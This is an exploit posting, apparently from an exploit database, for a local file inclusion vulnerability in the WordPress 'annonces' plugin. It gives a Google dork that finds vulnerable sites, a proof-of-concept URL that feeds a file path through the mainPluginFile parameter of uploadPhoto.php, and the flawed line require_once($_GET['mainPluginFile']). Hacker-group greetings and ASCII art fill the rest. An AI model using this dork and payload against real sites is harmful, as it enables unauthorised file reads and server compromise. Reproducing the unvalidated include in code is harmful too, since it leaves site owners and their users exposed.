wordpress annonces plugin local file inclusion LFI



EKU-ID: 1886 CVE: OSVDB-ID:
Author: Tunisian spl01t3r Published: 2012-04-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


+----------------------------------------------------------------------+
# Exploit Title: wordpress annonces plugin local file inclusion LFI
# Google Dork: inurl:wp-content/plugins/annonces
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Greetz: Milw0rm 1337day.com
# Software Link: http://wordpress.org/extend/plugins/annonces/download/

____ (_) ____   ___
(  _ \| |(  _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_|      |_|
_
(_)  ____   ____  ____     _____
| | /  __| /  __| \__ \   /  `  \
| | \___ \ \___ \  / _ \_ | Y Y  \
|_| |____/ |____/ (___  / |_|_|  /
  \/       \/                         
+----------------------------------------------------------------------+
[+] p0c : http://[SERVER]/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?mainPluginFile=[Lfi]

[+] vulnerable code :  require_once($_GET['mainPluginFile']);
      
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
        <3 jendoubi ahmed ; s-man ; chaouki mkachakh & ; Sohaieb Azaiez ;
                   &&&&  --Geni ryodan-- ;)
  
[+] profile :  www.facebook.com/TN.spl0it3r   
mAhna mAhna
+----------------------------------------------------------------------+